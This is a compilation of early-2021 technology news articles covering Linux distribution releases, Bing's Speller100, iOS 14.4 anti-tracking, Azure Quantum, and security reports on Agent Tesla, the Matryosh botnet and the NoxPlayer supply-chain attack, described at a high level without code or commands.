Speller100 is based on the concept of language families, with languages similarities that multiple languages share, and the so-called zero-shot learning, which allows a model to accurately learn and correct spelling without additional language-specific labeled training data.

The models are trained with tasks like MLM (Masked Language Model), next-sentence prediction, and translation. Although, these are commonly used WordPiece or SentencePiece subword segmentation algorithms that break down words into smaller constituents, existing pretraining tasks will operate at the word, phrase, or sentence level for semantic understanding.

How this major AI Leap will help Bing do better search?



Speller100 is perhaps the most comprehensive spelling correction system so far, in terms of the number of languages covered and overall accuracy. And given the improved technology, the search results for all Bing users will become more accurate by expanding accurate spelling correction in over 100 languages.

In fact, analysts have postulated a double-digit improvement in both search spelling correction precision and recall rate, with comprehensive Bing online search A/B testing as follows: the number of times users clicked on item on the search page went from single digits to 70% and 30% reduction in overall number of pages with no results.

Bing Speller100: Zero-shot Search Spelling Correction at Scale

Agent Tesla remote access Trojan (RAT) acts as spyware, keylogger, and data stealer, with the Trojan written in Microsoft’s .Net language (including C# and VB .Net) and operational since 2014.

According to Security researchers at Sophos, there are new delivery and evasion techniques employed by Agent Tesla to get around endpoint security and defense barriers. While the Trojan formerly relied on social engineering lures, now the Windows spyware targets Microsoft's Antimalware Scan Interface (AMSI) to infiltrate endpoint protection software.

Also, it employs a multi-stage installation process using Tor and Telegram messaging API to communicate with its command-and-control (C2) server which helps to evade detection.

How Agent Tesla bypass Sandbox defenses and Malware scanners?



SophosLabs has been tracking Agent Tesla, and the multiple actors using the malware, including the recent RATicate campaigns.



The researchers were able to discover new variants in a growing number of attacks; and as recent as December of 2020, Agent Tesla accounted for about 20 percent of email phishing attacks detected in Sophos customer telemetry. And the different variants of the malware tagged as Agent Tesla v2 and v3; with the key differences between v2 and v3 seen only on success in providing more C2 options and the success rate of the malware against security defenses.

The multi-stage malware installation process has also received significant upgrade, as the first-stage malware downloader now attempts to modify code in the Antimalware Scan Interface (AMSI) in a bid to skip scans of second-stage malicious payloads, such as those from Pastebin.

How IT admins can safeguard against Agent Tesla



Agent Tesla mainly engages email attachments to spread, therefore it is recommended that organizations should install an intelligent, security solution that can detect and block suspicious emails and attachments before they reach employees' inboxes.

Additionally, it is advised to implement recognized authentication standards to verify that emails are what they claim to be, while constantly educating employees on how to spot suspicious emails and what to do when they encounter such maliciously crafted emails.

Evasion Techniques employed by Agent Tesla to bypass Endpoint Security

The upcoming stable Mageia 8 release is still a long way ahead, but the latest update, Mageia 8 RC1 brings several core package updates.

While Mageia 8 Alpha 1 update was made available in July 2020 to early testers to help with the development of the stable final release of Mageia 8. With large scale updates to core packages as well as features to improve on what Mageia already offered; albeit the initial final release scheduled for September 18 has surpassed its estimated time.

Nonetheless, the first release candidate (RC1) which was announced on February 6, means that Mageia 8 development though a bit slow is still a work-in-progress.

What's New in Mageia 8 RC1



Mageia 8 RC1 brings the latest Linux Kernel 5.10.12 LTS, and update desktop environments such as Xfce 4.16, Mate 1.24 and Plasma 5.20.4. It uses the new GLVND (GL Vendor Neutral Dispatch) that allows you to install Mesa and any other third-party GL drivers in parallel, with improved performance and hybrid GPU configurations.



Also, Mageia 8 RC1 has updated the Java stack to version 11, with support for Java 8 removed (though users can still work with Java 8). Other core package updates in Mageia 8 RC1, includes:

  • LibreOffice 7.0.4.2
  • Chromium 88 (x86_64-only)
  • Python 3.8.5, Rust 1.48.0, Ruby 2.7.2
  • GCC 10.2.1, LLVM 10.0.1
  • Cinnamon 4.8.3
  • Systemd 246


Additionally, Mageia 8 RC1 also brings improvements in the Netinstall ISO image, which now allows installation via Wi-Fi connections using WPA encryption.

How to Download Mageia 8 RC1



If you want to give Mageia 8 RC1 a spin, you can download the torrent file or ISO image here. It offers installation media for both 32 and 64bit systems, with 64bit live images for Plasma, GNOME and Xfce, as well as 32bit live image for Xfce.

But as always recommended with pre-release images, do not install on your main system, and you should use your best judgement.

Mageia 8 Update: Release Candidate 1 (RC1) out with new GLVND support

Apple's new iOS 14.4 privacy policies is generating a whole lots of furore in the online advertising circle, especially as regards target advertising.

While Apple also brought a number of countermeasure with iOS 14.4 update to prevent attacks such as the introduction of a new, sandboxed 'BlastDoor' feature which is responsible for almost all the parsing of untrusted data in iMessage. BlastDoor forms the core of new security protections coming to the iPhone, with all inbound messages in a secure, sandboxed environment, preventing any maliciously crafted message from interacting with the operating system to access users data.

Besides these security enhancements, Apple’s new anti-tracking features has been seen as a big hit in the ad revenue generated by internet marketers and to companies that rely on cross-device user tracking and the resulting ad revenue to continue their offering of free services.

How the Anti-tracking Feature in iOS 14.4 update works?



The new Anti-tracking Feature in iOS 14 will inform iPhone users when an app is tracking their activities, with each app having to explicitly request from the user if it can track their activities before the use of the app.



And iPhone users will see a pop-up notification asking for tracking permissions when they open the app, as the app will also elaborate on what they use the data for so that the user will be well-informed before granting the permission. The app tracking transparency in iOS 14.4 means that every app will require that they ask for your permission first.

Apple aims to give users the freedom to choose whether they want any app to track their activities with the introduction of App tracking transparency.

Why the Future looks bleak for Targeted Advertising?



Even Google, whose revenue depends solely on the ad business, is obviously looking to bring anti-tracking feature to Android, albeit with less policing than Apple's iOS update.

And recently, the company announced a highly monumental change to its Chrome browser, which over the course of next two years, will phase out support for third-party cookies. The hint on the crumbling of cookie has definitely raised a lot of arguments among advertisers and publishers, as it will impact heavily on online marketing.

If third-party cookies are wiped out in Chrome, in that programmatic system, it means online advertisers will be unable to personalize or serve targeted ads for almost half of these audience, as statistics points to about two billion installation and one billion people using the browser each month.

Apple’s iPhone Anti-tracking features in the iOS 14.4 update

EndeavourOS team has announced the first release of 2021, EndeavourOS 2021.02.03, which follows on the heels of the regular desktop version 2020.09.19.

While the team also recently announced a new project that offers EndeavourOS for ARM computers, which is similar to the collaboration for EndeavourOS x86_64 and Arch Linux; EndeavorOS ARM aims to provide same experience on devices running ARM (Acorn RISC Machine) based processors.

EndeavourOS 2021.02.03 comes with improved features such as the live environment and updated offline option, that now installs the latest fully themed Xfce 4.16 desktop.

What's New in EndeavourOS 2021.02.03 Release?



EndeavourOS 2021.02.03 has the core software updated to latest versions, such as Linux Kernel 5.10.11.arch1-1, Nvidia 460.39-2, Mesa 20.3.4-1, Firefox 85.0-1, and Calamares 3.2.34-10.



And besides the updated offline option, that now installs the latest fully themed Xfce 4.16 desktop, EndeavourOS 2021.02.03 also added several new features as listed below:

  • Welcome app now supports Brazillian-Portuguese
  • GVFS packages are now only installed when chosen GTK environments
  • Reflector-bash-completion added to make the use of Reflector easier
  • For online install, mirrors will automatically update for a faster install and to decrease unresponsive mirrors
  • Reordering and adding packages installed to improve filesystem support on GTK and QT environments
  • QT environments have now kio-fuse, kio-gdrive and audiocd-kio installed by default
  • Alacrity added as one of the supported terminals for our native apps
  • Reflector-auto removed since Reflector has it shipped by default>


Additionally, there is a new option in Welcome –pkglist=URL to add additional packages on installation using user_pkglist.txt file which also can be found under user_pkglist.txt in the file liveusers home and users can edit it to install additional packages.

How to Download or Upgrade to EndeavourOS 2021.02.03



If you're a new user and want to try out the latest EndeavourOS 2021.02.03, you can get the ISO image from here.

However, you'll need a fresh installation of the latest ISO image as a first-timer. And if you encounter any issues, there are official installation instructions available here.

EndeavourOS 2021.02.03 Release brings Latest fully themed Xfce 4.16 desktop

There is a new DDoS Botnet, dubbed "Matryosh" which malware campaign leverages on Android devices to create a botnet with the primary purpose of carrying out DDoS (distributed denial-of-service) attacks.

According to Qihoo 360's Netlab researchers, Matryosh has been discovered as reusing the Mirai botnet framework and propagates via Android Debug Bridge (ADB) interfaces to infect Android devices. While ADB command-line tool is part of the Android SDK that allows developers to debug apps and also, handles communications on Android devices.

Albeit, the command-line tool functions are turned off by default on most Android devices, but some vendors have this feature enabled, which could allow attackers to connect remotely and open the devices to exploitation.

How Matryosh DDoS Botnet targets Android-Based Devices



First, Matryosh decrypts the remote hostname and uses DNS TXT request to obtain TOR C2 and TOR proxy, which it then establishes a connection with the TOR proxy to communicate with the TOR C2 server through the proxy, and for further instructions from the server.



It is propagated via ADB, with the captured payload, whose main function is to download and execute scripts from the remote host. And the encryption algorithm implemented in Matryosh and the process of obtaining C2 are nested in layers. This botnet stands out from other such malware campaigns as it uses Tor to mask its activities and funnel the commands from an attacker-controlled server via the network.

And Matryosh also stores sensitive resources encrypted to prevent the relevant functions from being spotted by cybersecurity researchers.

Efforts to thwart Matryosh DDoS Botnet from Spreading



Matryosh's cryptographic design falls into the Mirai single-byte XOR pattern, which made it easy to be flagged by antivirus software as Mirai; but the changes at the network level indicates that its authors wanted to protect the C2 by downlinking the configuration from the cloud, which brings some difficulties to static analysis.

The act of putting all remote hosts under the same SLD, though not optimal, might change and Qihoo 360's Netlab researchers have promised to keep an eye on it. As all the related domains have been blocked by their DNSmon system.

New DDoS Botnet Spreading via Android devices

Solus is an independently developed Linux distribution for x86-64 architecture and features the homegrown Budgie desktop environment, GNOME, MATE or KDE Plasma as the desktop environment.

Now, the Solus team has released a new version of Solus 4 ‘Fortitude’ series, Solus 4.2 which follows on the heels of the previous version 4.1 with updates for the software stacks, multimedia, and hardware enablement.

Solus 4.2 offers different audio and video multimedia playback software out-of-the-box that caters specifically for each edition. With Budgie, GNOME, and MATE editions shipped with Rhythmbox for audio playback, MATE ships with VLC for video playback and KDE Plasma ships with Elisa for audio playback and SMPlayer for video playback.

What's New in Solus 4.2 Release?



Solus 4.2 ships with Linux kernel 5.10.12, which enables provide support for a range of the newer hardware, including AMD Ryzen 5th generation processors and Intel Comet Lake CPUs, such as Intel Core i9-10850K.



And Solus 4.2 also ships with the latest release of Budgie 10.5.2, GNOME 3.38 Stack (3.38.3), MATE 1.24, and Plasma Desktop 5.20.5, KDE Frameworks 5.78, KDE Applications 20.12.1 and QT 5.15.2, which brings several many new features. Other new features and hardware capabilities, include:

  • Support for Solarflare NICs
  • Improved exFAT file system support
  • Enabled ACPI and HID ambient light sensors
  • Realtek 8723DE and 8821CD PCI wireless network adapters
  • Support for setup / unlock / lock Locking ranges for SED devices using the Opal protocol
  • Enabled various modules required for software such as CTParental, Mininet, and ROCm
  • Several new USB cameras
  • XFS Online Repair


Additionally, Mesa has been upgraded to 20.3.3 and Solus 4.2 also introduces support for new GPUs, Vulkan 1.2 API support, with numerous fixes for the latest gaming titles, and ACO shader compilation is enabled by default for the RADV Vulkan driver.

How to Download or Upgrade to Solus 4.2



If you wish to try out the latest release of Solus v4.2, you can download the ISO image of your chosen edition here.

You can follow the Installation guide to determine what software to use to burn or write the Solus ISO to a DVD or USB drive. And if your system is UEFI-enabled, it is recommended that you follow the UEFI guide.

Solus 4.2 Release: Updated Budgie, GNOME, MATE and KDE Plasma

Microsoft has opened Azure Quantum, its cloud ecosystem for building quantum computing applications, to the public for use in a preview phase.

While Microsoft has been at the heart of creating a full software stack that will give developers a chance to learn about quantum computing programming; with its Q# language (pronounced “q sharp”) and simulator which were first announced in 2017, intended to bridge the functions, variables, and branches of traditional programming concepts.

Quantum computing is a relatively new field with built algorithms from wiring up logic gates; including vector and matrix mathematics, the qubit, Dirac notation, Pauli measurements, and quantum circuits.

Free trial for Azure Quantum cloud service



Microsoft announced on February 1, that the Azure Quantum cloud service will be available for a free trial. With developers, researchers, and other integrators able to use the platform to build different solutions leveraging the tools in a trusted public cloud.



The key component of the platform is the open source Quantum Development Kit developed by Microsoft with the Q# language for quantum programming. And Microsoft’s Quantum Intermediate Representation (QIR) featured as a common open source interface between the languages and target quantum computations.

Microsoft looks to partner with Honeywell Quantum Solutions and IonQ in providing quantum computing hardware. Microsoft has already made available a primer on essential quantum computing concepts, and the Q# development kit with detailed instructions on the installation and introductory programming tutorials.

Getting Started with Azure Quantum cloud service



Microsoft invites developers to explore the system, which will be offered on a pay-as-you go basis. Azure Quantum has been employed for applications such as freight optimization, cancer research, logistics and risk management.

Even as quantum computing is perceived as capable of disrupting many industries once it becomes available and ubiquitous, it will also help in solving pretty complex problems.

Microsoft opens up Azure Quantum cloud service for public preview

Ubuntu Core is a minimal and containerized version of the Ubuntu Linux distribution, designed specifically for IoT and embedded devices, with the latest version Ubuntu Core 20 based on Ubuntu 20.04 ‘Focal Fossa’ LTS.

While Ubuntu Core is aimed at offering a secure Linux experience for IoT with security and privacy features such as full disk encryption, secure boot and secure device recovery. Ubuntu Core 20 follows after Ubuntu Core 18 which was released in 2019, with Canonical already preparing for the next regular Ubuntu release v21.04 “Hirsute Hippo” scheduled for release on April 22, 2021.

The regular Ubuntu release uses the traditional Debian package system, but Ubuntu Core relies entirely on the universal package management system called snap, developed in-house by Canonical.

What's New in Ubuntu Core 20?



Ubuntu Core 20 brings several new security updates and features for better security, with all snaps on Ubuntu Core devices strictly confined and isolated to any compromised application getting the whole sytem infected.



Among the new security features is the secure boot by default with hardware-backed full disk encryption which ensures privacy and guarantee confidentiality from attackers. Other security enhancements in Ubuntu Core 20, includes:

  • Recovery and reinstall mode
  • Recovery mode chooser
  • Full-disk encryption via TPM integration


Additionally, there is support for Cloud-init and Initial MAAS, with ten years of support for Raspberry Pi (both ARMv7 and ARM v8).

How to Get Started with Ubuntu Core 20



Ubuntu Core 20 is currently available for download for x86_64 and ARM hardware, with the ISO images and if you wish to learn about Ubuntu Core, you can check out the official documentation.

Kindly note that the model definition has been expanded for UC20 devices to include several new options, notably grade and snaps.

Ubuntu Core 20: Containerized Linux distro for IoT and embedded devices

Operation NightScout, as dubbed by ESET researchers, is a highly-targeted surveillance campaign that involved distributing different malware families through malicious updates to targeted victims in Hong Kong, Taiwan, and Sri Lanka.

According to ESET researchers, the new supply-chain attack targets online gamers via the compromising of the update mechanism of NoxPlayer.

NoxPlayer is developed by Hong Kong-based company named BigNox, with an estimated userbase of more than 150 million in over 150 countries; it allows users to play mobile games on both PC and Mac.

The malware campaign is believed to have started around September 2020, with the attacks continuing until "explicitly malicious activity" in the wild was discovered on January 25, which prompted ESET researchers to report the issue to BigNox.

How the New Supply‑Chain Attack Targets Online Gaming?



The malware campaign is based on compromised software whereby the delivered malware exhibits surveillance capabilities, which is believed indicates the intent of intelligence collection on targeted victims in the gaming community.



And the NoxPlayer update mechanism serves as the vector that delivers the trojanized version of the software, which upon installation, distributes three different payloads, including Gh0st RAT that spy on victims, captures keystrokes, and gathers other sensitive information.

There is also an instances where malware binaries like PoisonIvy RAT were downloaded by the NoxPlayer updater from remote servers under the control of the threat actors.

The malware loaders employed in the attack shared similarities with a breach of a Hong Kong university in 2020, which ESET claims the operators behind the attack were responsible for breaching BigNox's infrastructure, as evidence alludes that its API have been compromised.

How NoxPlayer users can Safeguard their Systems



For NoxPlayer users who are uninfected, it is advised that they desist from downloading updates until BigNox has fixed the vulnerabilities and sends notification that they've mitigated the security threat.

Furthermore, as a best security practice it is recommended that users should uninstall the software in order to be on the safer side, and any case of intrusion, users can perform a standard reinstall process.

Operation NightScout: New Supply‑Chain Attack Targeting Online Gaming

JingOS is a full-fledged Linux distribution based on Ubuntu, designed for tablets and capable of running Linux apps like Libre Office, VS Code, and many more.

While JingOS is inpired by iPadOS, and the iPadOS-like UI and UX coupled with Qt/Plasma-based experience is enough to get anyone excited by the emergence of this Ubuntu-based distro which users can now indulge in some hands-on experimentation.

The first public version 0.6 of JingOS is now available for download, albeit this version is intended for use by early-adopters, willing testers, and developers only.

What features are available for the JingOS v0.6 first public preview?



JingOS v0.6 first public preview comes with a raft of KDE applications preinstalled, which includes the KDE terminal app Konsole, WPS Office, camera utility, and Dolphin file manager and Chrome browser.



And the core JingOS desktop, and basic control centre are also present in the preview version and there’s a notification hub, task manager, and bespoke apps that are created exclusively for JingOS such as a calendar app, photos app and voice memo tool.

The obvious drawbacks include the fact that there are a tonne of missing apps, and features, with touchpad and touchscreen gestures only available on the Surface Pro 6 and Huawei Matebook 14 which are the two reference platforms supported by JingOS at present.

Also, there is no built-in update mechanism, and the versions of utilities like the system settings tool and file manager are missing too, and no virtual keyboard.

How to Download JingOS v0.6



If you wish to try out JingOS v0.6, you'll need to submit your email to get the download link. You can get more details on this build, a link to the mailing list (which is required to get a download link), and installation instructions (including “how to” get the .iso images working in VirtualBox) on the JingOS forum.

However, the more stable version of JingOS will be available in March, with versions 0.8 and 1.0 scheduled for release on March 31 and June 30, 2021, respectively.

JingOS v0.6 first public preview: New Linux distro designed for tablets